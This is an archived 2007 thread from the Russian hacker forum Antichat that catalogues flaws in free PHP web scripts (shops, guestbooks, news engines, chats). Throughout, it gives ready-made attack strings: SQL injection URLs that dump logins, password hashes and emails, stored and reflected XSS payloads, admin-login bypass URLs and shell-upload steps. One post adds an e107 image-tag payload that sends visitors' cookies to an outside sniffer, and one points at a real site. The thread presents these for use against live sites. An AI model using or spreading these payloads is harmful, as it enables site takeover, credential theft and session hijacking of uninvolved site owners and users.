Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   Энциклопедия уязвимых скриптов (https://forum.antichat.xyz/showthread.php?t=19997)

freddi 26.04.2007 23:20

Amiro.CMS

Активная хсс в гостевой, уязвимы поля "Заголовок:" и
"Сообщение:"

Искать "Работает на: система управления сайтом Amiro CMS"

Grey 27.04.2007 20:05

Бесплатные движки инет-магазинов:

1. myInvoice 1

SQL инъекция:

Код:

http://site.ru/invoice.php?id='+union+select+1,2,3,4,5,6/*
Вывод номера, логина, хеша пароля (mysql4) и мыла пользователя:

Код:

http://site.ru/invoice.php?id='+union+select+1,2,3,convert(concat(clientid,char(58),name,char(58),password,char(58),email),char),5,6+from+clients/*
--------------------

2. Shop-Script Free

SQL инъекция:

Код:

http://site.ru/index.php?CID=-1+union+select+1,2/*
http://site.ru/index.php?CID=-1+union+select+1,convert(concat(database(),char(58),user(),char(58),version()),char)/*

--------------------

3. Pricelistme! 1

SQL инъекция:

Код:

http://site.ru/one_index_product.php?loginis=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
http://site.ru/one_index_product.php?loginis=-1+union+select+1,convert(concat(database(),char(58),user(),char(58),version()),char),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*

---------------------------------------------------
---------------------------------------------------

Календари и органайзеры:

1. Geo-Contacts 1.1

SQL инъекция:

Код:

http://site.ru/view.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
http://site.ru/view.php?id=-1+union+select+1,2,3,convert(concat(database(),char(58),user(),char(58),version()),char),5,6,7,8,9,10,11,12/*

2. phpAbook 0.8.5b

Пассивная XSS:

Код:

http://site.ru/include/inc.footer.php?abook_vers=<script>alert();</script>
3. php-addressbook v1.2

SQL инъекция:

Код:

http://site.ru/view.php?id=-1+union+select+1,2,3,convert(concat(database(),char(58),user(),char(58),version()),char),5,6,7,8,9,10,11,12/*
---------------------------------------------------
---------------------------------------------------


Игры:

1. 100 Question Simple Trivia Script 1

SQL инъекция:

Код:

http://site.ru/trivia.php?trivia_id=-1+union+select+1,2,3,4,5/*
http://site.ru/trivia.php?trivia_id=-1+union+select+1,convert(concat(database(),char(58),user(),char(58),version()),char),3,4,5/*


Grey 30.04.2007 21:18

Гостевые книги:

1. EzGuestBook 1.1

1) Активные XSS:

При создание сообщения в поля Name, E-Mail, Message вписываем скрипт, скрипт будет выполняться при просмотре сообщений, в том чиле и в админке.

2) SQL инъекция:

Код:

http://site.ru/guestbook.php?action=sort&by=name&from='+union+select+1,2,3,4,5/*
Вывод логина и пароля пользователя:

Код:

http://site.ru/guestbook.php?action=sort&by=name&from='+union+select+concat(login,char(58),password),2,3,4,5+from+ez_guestbook_auth/*
2. ChitChat 2.0

Активная XSS:

При создание сообщения в поле Website вписываем скрипт, скрипт будет выполняться при просмотре сообщений.

3. ParkerGuestbook v4.00 Add moderators

Из-за не корректного условия проверки логина и пароля, можно попасть в админку зная только логин или только пароль.
Угадать логин проще - к примеру стандартный логин admin, его могут не поменять.

Доступ к админке, имя только логин:

http://site.ru/admin.php?adminlogin=grey&logged=1

Доступ к админке, имя только пароль:

http://site.ru/admin.php?adminpass=123&logged=1

4. ParkerGuestbook v2.00

Активные XSS:

При создание сообщения в поля Имя, Сайт, ICQ, Город вписываем скрипт, скрипт будет выполняться при просмотре сообщений.

Grey 01.05.2007 17:11

Гостевые книги:

1. NEOgeN GuestBook 1.2

1) Активная XSS:

При добавление сообщения в поле Ваше Имя вписываем скрипт, скрипт будет выполняться при просмотре сообщений.

2) Пасивная XSS:

Код:

http://site.ru/footer.php?GBookTitle=<script>alert();</script>
2. Php Trofimov guestbook v1.0

Активная XSS:

При добавление сообщения в поле Имя вписываем скрипт, скрипт будет выполняться при просмотре сообщений.

3. Trofimov book v1.0

Из-за отсутствия условия входа в админку, можно получить достп в админку:

http://site.ru/gb.php?action=admin

4. Rzhavin FAQ 1.0

1) Из-за не коректного условия входа в админку, можно получить частичный достп в админку:

http://site.ru/admin.php?showform=1

2) Активная XSS:

При добавление сообщения в поле Имя вписываем скрипт, скрипт будет выполняться при просмотре сообщений.

5. spiderLog 1.0

Активные XSS:

При добавление сообщения в поля Name, E-mail Address, City, State / Province, Country вписываем скрипт, скрипт будет выполняться при просмотре сообщений.

6. Filebased Guestbook 1.0.1

Активные XSS:

При добавление сообщения в поля Name, Comment вписываем скрипт, скрипт будет выполняться при просмотре сообщений.

Grey 04.05.2007 18:40

Новостные двиги:

1. CuteNews rus v025

Пасивная XSS:

Код:

http://site.ru/example2.php?dosearch=yes&story="><script>alert();</script>
2. CuteNews.RU v.026

Активные XSS:

При добавление комментария в сообщение в поля Имя и Сообщение вписываем скрипт, скрипт будет выполняться при просмотре коментариев.

3. pagenews 1.0

1) SQL инъекция:

Код:

http://site.ru/insert.php?id='+union+select+1/*
http://site.ru/insert.php?id='+union+select+convert(database(),char)/*

2) Заливка шелла:

При загрузке файлов на сайт, расширение файла не проверяется.

Загружаются файлы в директрию uploads:

http://site.ru/uploads/shell.php

4. Sunny's Simple Diary

SQL инъекция:

Код:

http://site.ru/index.php?month='+union+select+1,2,3/*
http://localhost/1/index.php?month='+union+select+1,convert(version(),char),3/*

5. vNews v1.2

1) Свободный доступ в админку:

http://site.ru/newsadmin.php

2) Активная XSS:

При добавление новости в поле News вписываем скрипт.

3) SQL инъекция:

Код:

http://site.ru/newscontent.php?action=edit&id='+union+select+1,2,3/*
http://site.ru/newscontent.php?action=edit&id='+union+select+1,convert(version(),char),3/*


freddi 04.05.2007 23:06

Цитата:

Сообщение от Grey
5. Sad Raven's Guestbook v1.1

Можно попасть в админку минуя ввод логина и пароля:

http://site.ru/gb/admin.php?logined=1


А можно перейти по ссылке
www.сайт.ru/gb/passwd.dat
и перед нами будет:
<?php
$Password['логин'] = "хеш пароля";
?>

пример
http://www.ivanovo.ac.ru/win1251/fac_phys/admin.php


еще прикольная фишка там со знаком "|" попробуйте вставлять его в поля разные.

SkyMan 05.05.2007 13:12

e107 (какая версия не знаю, но не 7.8)
Этот текст можно вставлять в сообщение на форуме, в комментарий к новости, в личное сообщение.
[img]http://<путь к картинке>'onload=i=new/**/Image();i.src=unescape('%68%74%74...')+document.co okie;'[/img]
где %68%74%74... - закодированный путь к снифферу со знаком вопроса в конце.

+StArT+ 09.05.2007 04:37

На днях нашел. :)

BlaB! Lite 2.2
Скрипт для полноценного чата на PHP
Активная XSS:
.................................................. .......................
Уязвимость существует из-за недостаточной
обработки входных данных в поле "Nickname:"
в сценарии login.php:

В поле "Nickname:" пишем:
Код:

<SCRIPT>alert(document.cookie)</SCRIPT>

Входим,отправляем сообщение,видим знакомый алерт();! ;)
____________________________________

Подмена IP-адреса:
.................................................. .......................
В поле "Nickname:" пишем:

Код:

Желаемое имя:|:Ваше сообщение:|:Любой IP-адрес
Входим,отправляем сообщение
(содержание не важно!).

Таким образом в базу заносится не ваш IP-адрес,
а тот который вы указали!

Пример:

http://zeus.aegee.org/cdstuff/chat
_____________________________________
*********************************

Grey 13.05.2007 18:48

Скрипт знакомств:

Интим-услуги Nevius

1) Пасивная XSS:

Код:

http://site.ru/list.php?g=<script>alert();</script>
2) SQL инъекция:

Код:

http://site.ru/list.php?g=&link=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,23,24,25,26,27,28,29,30,31,32,33,34,35,36/*
Вывод логина и пароля пользователя:

Код:

http://site.ru/list.php?g=&link=-1+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+users/*

Grey 29.05.2007 18:53

PHP Advanced Transfer Manager Full version: 1.30

Скрипт очень дырявый, в нём еще локальный инклуд файлов находили:

http://forum.antichat.ru/showpost.ph...62&postcount=8

а вот про xss вроде не было:

Пасивные XSS:

viewers/txt.php

Код:

http://site.ru/viewers/txt.php?filename=<script>alert();</script>
http://site.ru/viewers/txt.php?current_dir=<script>alert();</script>

viewers/jpg.php

Код:

http://site.ru/viewers/jpg.php?filename="><script>alert();</script>
http://site.ru/viewers/jpg.php?directory="><script>alert();</script>

viewers/jpeg.php

Код:

http://site.ru/viewers/jpeg.php?filename="><script>alert();</script>
http://site.ru/viewers/jpeg.php?directory="><script>alert();</script>

viewers/gif.php

Код:

http://site.ru/viewers/gif.php?filename="><script>alert();</script>
http://site.ru/viewers/gif.php?directory="><script>alert();</script>

viewers/bmp.php

Код:

http://site.ru/viewers/bmp.php?filename="><script>alert();</script>
http://site.ru/viewers/bmp.php?directory="><script>alert();</script>

viewers/png.php

Код:

http://site.ru/viewers/png.php?filename="><script>alert();</script>
http://site.ru/viewers/png.php?directory="><script>alert();</script>

viewers/swf.php

Код:

http://site.ru/viewers/swf.php?filename="><script>alert();</script>
http://site.ru/viewers/swf.php?directory="><script>alert();</script>

viewers/mov.php

Код:

http://site.ru/viewers/mov.php?filename="><script>alert();</script>
http://site.ru/viewers/mov.php?current_dir="><script>alert();</script>

viewers/tif.php

Код:

http://site.ru/viewers/tif.php?filename="><script>alert();</script>
http://site.ru/viewers/tif.php?directory="><script>alert();</script>

Заливка шелла:
------------------

В админке заходим в конфигурацию (Admin: Configure Upload Center)

Там можно редактивровать файлы:

footer.htm
header.htm
info.htm
mailinfo.htm

В любой из них вписываем шелл.
Главное что бы файлы с расширением .htm выполнялись как php.


Время: 02:02